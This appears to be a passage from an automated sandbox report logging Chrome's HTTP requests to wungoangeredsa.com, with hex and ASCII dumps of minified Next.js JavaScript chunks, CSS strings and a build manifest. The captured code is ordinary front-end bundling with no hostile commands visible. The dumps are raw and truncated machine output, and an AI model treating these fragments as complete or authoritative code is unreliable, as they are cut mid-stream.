                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 5c 6e 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 5c 6e 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 5c 6e 20 20 66 6f 6e 74 3a 20 69 6e 68 65 72 69 74 3b 5c 6e 5c 6e 20 20 63 75 72 73 6f 72 3a 20 6e 6f 74 2d 61 6c 6c 6f 77 65 64 3b 5c 6e 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 70 75 6c 73 65 20 32 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 20 30 2c 20 30 2e 36 2c 20 31 29 20 69 6e 66 69 6e 69 74 65 3b 5c 6e 5c 6e 20 20 70 6c 61 63 65 2d 73 65 6c 66 3a 20 63 65 6e 74 65 72 3b 5c 6e 5c 6e 20 20 26 3a 64 69 73 61 62 6c 65 64 20 7b 5c 6e 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 2e 37 3b 5c 6e 20 20 7d 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 76 61 72 20
                                                                                                          Data Ascii: \n color: #ffffff;\n line-height: 1.5;\n font: inherit;\n\n cursor: not-allowed;\n animation: pulse 2s cubic-bezier(0.4, 0, 0.6, 1) infinite;\n\n place-self: center;\n\n &:disabled {\n opacity: 0.7;\n }\n"]);return m=function(){return n},n}var
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 30 3b 5c 6e 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 33 33 33 3b 5c 6e 20 20 70 6c 61 63 65 2d 73 65 6c 66 3a 20 63 65 6e 74 65 72 3b 5c 6e 20 20 26 3a 68 6f 76 65 72 20 7b 5c 6e 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 5c 6e 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 5c 6e 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 64 64 64 3b 5c 6e 20 20 7d 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 65 2e 64 65 66 61 75 6c 74 3d 28 30 2c 69 2e 69 76 29 28 61 28 29 29 7d 2c 35 39 36 37 34 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3b 74 2e 64 28 65 2c 7b 69 3a 66 75 6e 63 74 69
                                                                                                          Data Ascii: 0;\n border: 1px solid #333;\n place-self: center;\n &:hover {\n color: #000;\n background: #fff;\n border-color: #ddd;\n }\n"]);return a=function(){return n},n}e.default=(0,i.iv)(a())},59674:function(n,e,t){"use strict";var r;t.d(e,{i:functi
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 69 73 63 6f 6e 6e 65 63 74 28 29 7d 29 2c 6e 29 2c 74 3d 75 2e 63 75 72 72 65 6e 74 3b 72 65 74 75 72 6e 20 74 26 26 65 2e 6f 62 73 65 72 76 65 28 74 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 64 69 73 63 6f 6e 6e 65 63 74 28 29 7d 7d 29 2c 5b 75 2c 6e 75 6c 6c 3d 3d 3d 6e 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 72 6f 6f 74 2c 6e 75 6c 6c 3d 3d 3d 6e 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 72 6f 6f 74 4d 61 72 67 69 6e 2c 6e 75 6c 6c 3d 3d 3d 6e 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 74 68 72 65 73 68 6f 6c 64 2c 6e 75 6c 6c 3d 3d 3d 6e 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 6f 6e 63 65 5d 29 2c 7b 72 65 66 3a 75 2c 69 6e 56 69 65 77 3a 74 2c 65 6e
                                                                                                          Data Ascii: isconnect()}),n),t=u.current;return t&&e.observe(t),function(){e.disconnect()}}),[u,null===n||void 0===n?void 0:n.root,null===n||void 0===n?void 0:n.rootMargin,null===n||void 0===n?void 0:n.threshold,null===n||void 0===n?void 0:n.once]),{ref:u,inView:t,en
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 77 69 74 68 43 6f 6e 66 69 67 28 7b 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 61 64 38 32 34 37 32 61 2d 30 22 7d 29 28 69 28 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 24 64 69 72 65 63 74 69 6f 6e 7c 7c 22 63 6f 6c 75 6d 6e 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 24 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 7c 7c 22 63 65 6e 74 65 72 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 24 61 6c 69 67 6e 49 74 65 6d 73 7c 7c 22 73 74 61 72 74 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 24 67 61 70 7c 7c 22 31 72 65 6d 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 24 64 69 72 65 63 74 69 6f 6e
                                                                                                          Data Ascii: withConfig({componentId:"sc-ad82472a-0"})(i(),(function(n){return n.$direction||"column"}),(function(n){return n.$justifyContent||"center"}),(function(n){return n.$alignItems||"start"}),(function(n){return n.$gap||"1rem"}),(function(n){return n.$direction
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 69 74 69 6f 6e 3a 20 6f 70 61 63 69 74 79 20 30 2e 34 73 20 65 61 73 65 3b 5c 6e 20 20 7a 2d 69 6e 64 65 78 3a 20 22 2c 22 3b 5c 6e 20 20 6f 70 61 63 69 74 79 3a 20 22 2c 22 3b 5c 6e 20 20 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 20 6e 6f 6e 65 3b 5c 6e 20 20 68 65 69 67 68 74 3a 20 22 2c 22 3b 5c 6e 20 20 66 69 6c 74 65 72 3a 20 22 2c 22 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 77 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 21 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 2e 43 4f 4e 46 45 54 54 49 3d 22 63 6f 6e 66 65 74 74 69 22 2c 6e 2e 53 45 4c 44 4f 4d 5f 43 4f 4e 46 45 54 54 49 3d 22 73 65 6c 64 6f 6d 5f 63 6f 6e 66 65 74 74 69 22 2c 6e 2e 4d 4f 4e 45 59 3d 22 6d 6f 6e 65 79 22 2c 6e 2e 53 4e 4f 57 3d 22 73 6e 6f 77 22 2c
                                                                                                          Data Ascii: ition: opacity 0.4s ease;\n z-index: ",";\n opacity: ",";\n pointer-events: none;\n height: ",";\n filter: ",";\n"]);return w=function(){return n},n}!function(n){n.CONFETTI="confetti",n.SELDOM_CONFETTI="seldom_confetti",n.MONEY="money",n.SNOW="snow",
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 3d 65 2e 72 61 69 6e 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 66 69 6c 74 65 72 29 2c 22 29 22 29 7c 7c 30 7d 29 29 7d 2c 32 34 36 30 37 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 64 28 65 2c 7b 4f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 7d 7d 29 3b 76 61 72 20 72 3d 74 28 35 36 37 35 33 29 2c 69 3d 74 28 39 32 32 32 38 29 2c 61 3d 74 28 39 33 38 38 38 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 76 61 72 20 6e 3d 28 30 2c 69 2e 5a 29 28 5b 22 5c 6e 20 20 30 25 20 7b 5c 6e 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 34 30 72 65 6d 20 30 3b 5c 6e 20 20 7d 5c 6e 20 20 31 30 30 25 20 7b 5c 6e 20 20 20 20 62 61 63 6b 67 72 6f
                                                                                                          Data Ascii: =e.rain)||void 0===t?void 0:t.filter),")")||0}))},24607:function(n,e,t){"use strict";t.d(e,{O:function(){return f}});var r=t(56753),i=t(92228),a=t(93888);function o(){var n=(0,i.Z)(["\n 0% {\n background-position: -40rem 0;\n }\n 100% {\n backgro


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          43192.168.2.450088104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:21 UTC412OUTGET /_next/static/chunks/81cd5f76d0de6e9e-1736072686539-dd624469daa80f67.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:21 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:21 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-6f9c"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1054
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:21 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4162fe79422b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:21 UTC873INData Raw: 36 66 39 63 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 7d 2c 61 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 66 28 64 29 7b 76 61 72 20 63 3d 61 5b 64 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 63 29 72 65 74 75 72 6e 20 63 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 62 3d 61 5b 64 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 2c 74 3d 21 30 3b 74 72 79 7b 65 5b 64 5d 2e 63 61 6c 6c 28 62 2e 65 78 70 6f 72 74 73 2c 62 2c 62 2e 65 78 70 6f 72 74 73 2c 66 29 2c 74 3d 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 26 26 64 65 6c 65 74 65 20 61 5b 64 5d 7d 72 65 74 75 72 6e 20 62 2e 65 78 70 6f 72 74 73 7d 66 2e 6d 3d 65 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 5b 5d 3b 66 2e 4f 3d 66 75 6e 63 74 69 6f 6e 28 61 2c
                                                                                                          Data Ascii: 6f9c!function(){"use strict";var e={},a={};function f(d){var c=a[d];if(void 0!==c)return c.exports;var b=a[d]={exports:{}},t=!0;try{e[d].call(b.exports,b,b.exports,f),t=!1}finally{t&&delete a[d]}return b.exports}f.m=e,function(){var e=[];f.O=function(a,
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 74 2e 6b 65 79 73 28 66 2e 66 29 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 61 2c 64 29 7b 72 65 74 75 72 6e 20 66 2e 66 5b 64 5d 28 65 2c 61 29 2c 61 7d 29 2c 5b 5d 29 29 7d 2c 66 2e 75 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 37 39 35 32 39 3d 3d 3d 65 3f 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 30 63 35 31 61 63 30 63 31 36 65 64 34 31 30 31 2d 31 37 33 36 30 37 32 36 38 36 35 33 39 2d 64 32 63 64 63 32 33 37 62 64 64 63 66 30 62 62 2e 6a 73 22 3a 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 22 2b 7b 31 38 32 3a 22 62 64 33 63 64 32 61 30 61 65 63 35 63 30 31 34 22 2c 38 38 34 3a 22 32 39 61 61 66 64 33 63 33 30 30 61 66 35 63 31 22 2c 31 30 35 31 3a 22 66 36 32 39 37 63 36 64 62 62 65 31 61 65 64 34 22 2c 31 32 38 35
                                                                                                          Data Ascii: t.keys(f.f).reduce((function(a,d){return f.f[d](e,a),a}),[]))},f.u=function(e){return 79529===e?"static/chunks/0c51ac0c16ed4101-1736072686539-d2cdc237bddcf0bb.js":"static/chunks/"+{182:"bd3cd2a0aec5c014",884:"29aafd3c300af5c1",1051:"f6297c6dbbe1aed4",1285
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 65 66 32 37 38 39 31 33 61 22 2c 31 30 34 34 39 3a 22 39 37 37 35 64 61 34 61 32 37 35 31 34 38 35 62 22 2c 31 30 36 32 32 3a 22 31 38 34 64 31 39 36 38 65 61 62 39 62 35 36 61 22 2c 31 30 36 34 38 3a 22 63 31 38 31 30 65 33 62 30 32 33 65 63 31 64 36 22 2c 31 30 38 30 39 3a 22 64 64 38 33 34 36 61 36 65 33 62 33 35 63 36 65 22 2c 31 31 30 31 33 3a 22 62 62 34 62 33 31 33 35 63 31 30 35 64 32 61 39 22 2c 31 31 30 38 35 3a 22 63 36 63 66 64 64 38 66 31 66 66 38 62 33 33 31 22 2c 31 31 34 38 35 3a 22 62 66 66 36 36 35 63 66 36 34 37 33 66 39 61 33 22 2c 31 31 35 30 34 3a 22 65 64 61 64 31 38 39 61 61 33 37 38 38 37 61 34 22 2c 31 31 37 31 31 3a 22 32 32 34 65 32 62 31 61 66 33 32 31 35 34 39 30 22 2c 31 32 31 37 33 3a 22 35 66 30 66 64 38 35 61 33 35 64 66
                                                                                                          Data Ascii: ef278913a",10449:"9775da4a2751485b",10622:"184d1968eab9b56a",10648:"c1810e3b023ec1d6",10809:"dd8346a6e3b35c6e",11013:"bb4b3135c105d2a9",11085:"c6cfdd8f1ff8b331",11485:"bff665cf6473f9a3",11504:"edad189aa37887a4",11711:"224e2b1af3215490",12173:"5f0fd85a35df
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 38 38 39 64 36 39 32 39 31 64 63 38 33 39 39 22 2c 32 35 34 37 32 3a 22 63 62 64 39 39 35 31 31 38 33 61 37 35 33 31 62 22 2c 32 35 38 38 38 3a 22 62 65 63 63 31 37 37 64 33 61 38 31 34 30 62 65 22 2c 32 35 39 30 30 3a 22 39 31 36 64 39 64 38 62 35 61 39 33 36 39 39 30 22 2c 32 36 32 31 38 3a 22 38 30 34 62 38 63 35 32 30 37 30 31 61 32 38 63 22 2c 32 36 33 37 31 3a 22 63 38 66 34 63 66 62 61 34 63 61 37 65 66 35 31 22 2c 32 36 37 32 37 3a 22 31 36 30 32 61 33 65 65 31 62 32 34 32 39 61 37 22 2c 32 37 31 35 30 3a 22 63 61 31 64 39 38 36 63 66 36 62 30 63 36 61 38 22 2c 32 37 35 39 35 3a 22 36 64 38 35 39 64 66 61 34 66 32 64 35 39 61 66 22 2c 32 37 38 31 37 3a 22 32 36 39 33 65 35 37 65 38 36 36 33 32 38 61 32 22 2c 32 37 38 37 36 3a 22 62 35 64 39 66 39
                                                                                                          Data Ascii: 889d69291dc8399",25472:"cbd9951183a7531b",25888:"becc177d3a8140be",25900:"916d9d8b5a936990",26218:"804b8c520701a28c",26371:"c8f4cfba4ca7ef51",26727:"1602a3ee1b2429a7",27150:"ca1d986cf6b0c6a8",27595:"6d859dfa4f2d59af",27817:"2693e57e866328a2",27876:"b5d9f9
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 35 35 36 3a 22 30 64 39 64 31 37 34 61 39 37 62 34 65 61 66 35 22 2c 33 38 36 32 35 3a 22 66 65 62 37 39 39 30 62 62 33 30 39 38 66 34 61 22 2c 33 38 38 38 32 3a 22 65 32 38 39 31 35 34 39 33 33 34 36 39 38 37 30 22 2c 33 38 38 39 30 3a 22 31 64 34 31 65 30 33 36 66 38 31 34 34 34 64 31 22 2c 33 38 39 30 34 3a 22 32 36 35 64 36 30 61 39 31 66 64 33 64 36 62 38 22 2c 33 38 39 34 34 3a 22 63 66 63 62 33 34 30 30 61 36 39 30 31 62 35 65 22 2c 33 38 39 39 36 3a 22 37 30 66 31 62 34 36 62 66 37 33 39 66 63 39 39 22 2c 33 39 30 36 38 3a 22 30 66 35 34 62 62 64 65 66 35 38 30 31 31 64 37 22 2c 33 39 33 31 34 3a 22 37 61 30 65 30 63 65 31 35 61 31 30 37 33 36 64 22 2c 33 39 34 32 36 3a 22 65 66 38 39 32 64 33 32 65 34 64 32 65 33 38 38 22 2c 33 39 36 39 37 3a 22
                                                                                                          Data Ascii: 556:"0d9d174a97b4eaf5",38625:"feb7990bb3098f4a",38882:"e289154933469870",38890:"1d41e036f81444d1",38904:"265d60a91fd3d6b8",38944:"cfcb3400a6901b5e",38996:"70f1b46bf739fc99",39068:"0f54bbdef58011d7",39314:"7a0e0ce15a10736d",39426:"ef892d32e4d2e388",39697:"
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 63 22 2c 34 38 35 30 39 3a 22 30 34 32 61 64 61 38 65 36 31 37 31 62 33 37 37 22 2c 34 38 35 33 30 3a 22 33 30 63 66 36 32 61 37 34 30 66 64 63 35 62 31 22 2c 34 39 30 35 31 3a 22 64 30 31 61 31 63 65 39 39 32 30 37 35 34 64 35 22 2c 34 39 31 33 37 3a 22 36 62 38 39 30 34 33 38 38 64 31 34 64 65 33 38 22 2c 34 39 31 39 30 3a 22 36 63 32 38 32 31 63 38 30 65 63 39 32 64 39 66 22 2c 34 39 35 35 34 3a 22 38 36 66 63 33 36 32 31 34 61 34 35 31 32 62 35 22 2c 34 39 39 37 30 3a 22 36 32 31 30 32 36 31 61 34 32 62 66 36 65 39 36 22 2c 35 30 31 36 32 3a 22 32 64 36 30 33 63 32 38 37 33 33 66 36 36 63 32 22 2c 35 30 32 37 32 3a 22 66 65 65 34 34 31 32 39 64 63 37 64 66 66 66 33 22 2c 35 30 32 39 37 3a 22 31 35 65 37 31 33 31 64 61 36 34 37 36 37 66 61 22 2c 35 30
                                                                                                          Data Ascii: c",48509:"042ada8e6171b377",48530:"30cf62a740fdc5b1",49051:"d01a1ce9920754d5",49137:"6b8904388d14de38",49190:"6c2821c80ec92d9f",49554:"86fc36214a4512b5",49970:"6210261a42bf6e96",50162:"2d603c28733f66c2",50272:"fee44129dc7dfff3",50297:"15e7131da64767fa",50
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 35 33 33 35 35 33 35 22 2c 35 39 32 35 35 3a 22 39 66 61 35 32 34 65 33 32 32 34 61 39 38 35 63 22 2c 35 39 33 36 39 3a 22 64 36 37 39 66 33 31 37 33 30 36 66 63 31 37 64 22 2c 35 39 37 33 31 3a 22 38 65 39 34 30 31 33 32 62 31 35 38 61 36 38 32 22 2c 35 39 38 30 31 3a 22 62 38 38 65 61 62 35 37 66 32 36 37 36 66 62 66 22 2c 35 39 38 39 34 3a 22 37 30 31 31 34 65 39 62 36 61 32 62 65 64 38 34 22 2c 36 30 33 31 37 3a 22 39 39 64 65 31 37 65 61 34 33 64 63 65 38 63 37 22 2c 36 30 33 38 33 3a 22 66 39 37 31 65 64 35 35 30 32 38 35 61 33 63 62 22 2c 36 30 35 32 31 3a 22 36 63 36 66 34 30 33 31 34 38 32 32 62 37 62 63 22 2c 36 30 39 34 36 3a 22 34 33 30 64 62 39 32 37 66 61 31 61 33 64 36 63 22 2c 36 31 36 30 31 3a 22 36 30 34 34 61 61 35 62 61 63 35 37 31 30
                                                                                                          Data Ascii: 5335535",59255:"9fa524e3224a985c",59369:"d679f317306fc17d",59731:"8e940132b158a682",59801:"b88eab57f2676fbf",59894:"70114e9b6a2bed84",60317:"99de17ea43dce8c7",60383:"f971ed550285a3cb",60521:"6c6f40314822b7bc",60946:"430db927fa1a3d6c",61601:"6044aa5bac5710
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 34 65 32 37 37 34 62 34 38 31 61 62 66 22 2c 36 39 32 38 34 3a 22 38 38 36 63 63 62 34 36 35 38 64 65 35 61 63 35 22 2c 36 39 33 36 38 3a 22 62 36 63 39 36 39 38 34 65 65 63 64 30 36 66 31 22 2c 36 39 36 37 34 3a 22 32 62 35 65 61 33 66 63 39 61 61 32 61 66 63 33 22 2c 36 39 37 32 32 3a 22 38 38 30 37 64 38 37 63 38 35 62 66 33 35 64 33 22 2c 36 39 37 38 31 3a 22 35 31 38 36 65 64 34 37 35 63 39 61 36 61 39 62 22 2c 37 30 31 37 34 3a 22 38 62 31 38 39 35 34 31 39 37 37 32 39 30 38 33 22 2c 37 30 33 34 32 3a 22 39 34 66 31 36 65 30 35 62 34 33 31 63 63 66 39 22 2c 37 30 34 35 35 3a 22 62 62 66 62 66 32 31 65 34 37 31 36 31 36 35 30 22 2c 37 30 35 35 33 3a 22 33 30 37 64 64 64 35 30 31 34 34 33 66 30 32 37 22 2c 37 31 31 31 39 3a 22 31 65 31 34 61 65 30 35
                                                                                                          Data Ascii: 4e2774b481abf",69284:"886ccb4658de5ac5",69368:"b6c96984eecd06f1",69674:"2b5ea3fc9aa2afc3",69722:"8807d87c85bf35d3",69781:"5186ed475c9a6a9b",70174:"8b18954197729083",70342:"94f16e05b431ccf9",70455:"bbfbf21e47161650",70553:"307ddd501443f027",71119:"1e14ae05
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 39 3a 22 32 66 31 65 62 39 37 35 33 66 33 38 35 31 65 37 22 2c 37 38 36 37 37 3a 22 38 34 64 64 65 34 37 30 61 31 30 32 38 31 31 37 22 2c 37 38 38 30 36 3a 22 32 39 36 65 65 37 63 38 31 32 32 31 35 64 65 30 22 2c 37 38 39 31 31 3a 22 38 33 64 65 63 63 30 38 35 36 33 38 66 31 33 34 22 2c 37 38 39 37 36 3a 22 64 65 66 34 32 61 36 30 64 36 30 36 64 31 63 32 22 2c 37 38 39 38 37 3a 22 30 65 62 66 39 31 66 34 62 63 35 64 31 33 33 30 22 2c 37 39 31 30 34 3a 22 36 63 66 35 35 61 66 37 61 30 61 33 63 31 33 36 22 2c 37 39 32 32 34 3a 22 31 35 61 37 37 30 64 37 61 36 37 62 31 37 31 34 22 2c 37 39 33 36 32 3a 22 33 39 63 33 31 33 37 38 37 37 35 62 66 31 37 32 22 2c 37 39 37 33 38 3a 22 62 33 31 32 37 33 30 66 62 31 38 61 39 38 65 37 22 2c 37 39 39 32 30 3a 22 61 36
                                                                                                          Data Ascii: 9:"2f1eb9753f3851e7",78677:"84dde470a1028117",78806:"296ee7c812215de0",78911:"83decc085638f134",78976:"def42a60d606d1c2",78987:"0ebf91f4bc5d1330",79104:"6cf55af7a0a3c136",79224:"15a770d7a67b1714",79362:"39c31378775bf172",79738:"b312730fb18a98e7",79920:"a6
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 22 2c 38 38 39 31 36 3a 22 31 36 61 30 61 61 36 63 35 38 36 36 65 39 33 30 22 2c 38 38 39 36 33 3a 22 63 38 33 65 31 35 63 65 36 38 37 37 34 65 61 38 22 2c 38 38 39 39 35 3a 22 30 64 66 66 33 34 62 37 39 35 62 30 30 63 66 37 22 2c 38 39 31 36 33 3a 22 39 64 30 64 34 38 61 34 38 39 34 37 39 65 39 38 22 2c 38 39 32 35 30 3a 22 36 34 36 32 36 36 38 37 63 36 34 30 35 33 62 34 22 2c 38 39 32 38 30 3a 22 32 39 38 33 66 36 39 62 63 34 62 37 36 39 61 63 22 2c 38 39 34 35 39 3a 22 38 30 62 31 66 33 35 65 31 34 62 35 66 61 35 62 22 2c 38 39 35 35 35 3a 22 61 65 66 39 39 30 66 39 63 66 30 61 36 39 30 66 22 2c 38 39 36 30 37 3a 22 30 38 36 36 35 32 65 65 61 64 66 32 62 63 37 35 22 2c 38 39 36 31 37 3a 22 39 32 33 64 64 63 63 65 66 32 34 31 38 36 35 37 22 2c 38 39 39
                                                                                                          Data Ascii: ",88916:"16a0aa6c5866e930",88963:"c83e15ce68774ea8",88995:"0dff34b795b00cf7",89163:"9d0d48a489479e98",89250:"64626687c64053b4",89280:"2983f69bc4b769ac",89459:"80b1f35e14b5fa5b",89555:"aef990f9cf0a690f",89607:"086652eeadf2bc75",89617:"923ddccef2418657",899


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          44192.168.2.450089104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:21 UTC533OUTGET /_next/static/3ufPxZgwc9gMArDis_san/_ssgManifest.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:21 UTC494INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:21 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-a0"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1626
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:21 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41635ad342ab-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:21 UTC166INData Raw: 61 30 0d 0a 73 65 6c 66 2e 5f 5f 53 53 47 5f 4d 41 4e 49 46 45 53 54 3d 6e 65 77 20 53 65 74 28 5b 22 5c 75 30 30 32 46 5b 6c 61 6e 64 69 6e 67 4e 61 6d 65 5d 5c 75 30 30 32 46 5b 63 6f 6e 66 69 67 49 64 5d 5c 75 30 30 32 46 5b 5b 2e 2e 2e 73 6c 75 67 5d 5d 22 2c 22 5c 75 30 30 32 46 61 72 74 69 63 6c 65 5c 75 30 30 32 46 5b 69 64 5d 22 5d 29 3b 73 65 6c 66 2e 5f 5f 53 53 47 5f 4d 41 4e 49 46 45 53 54 5f 43 42 26 26 73 65 6c 66 2e 5f 5f 53 53 47 5f 4d 41 4e 49 46 45 53 54 5f 43 42 28 29 0d 0a
                                                                                                          Data Ascii: a0self.__SSG_MANIFEST=new Set(["\u002F[landingName]\u002F[configId]\u002F[[...slug]]","\u002Farticle\u002F[id]"]);self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB()
                                                                                                          2025-01-06 11:09:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          45192.168.2.450091104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:21 UTC412OUTGET /_next/static/chunks/1c02c3e681ea9f6d-1736072686539-ebf163de3da5e125.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
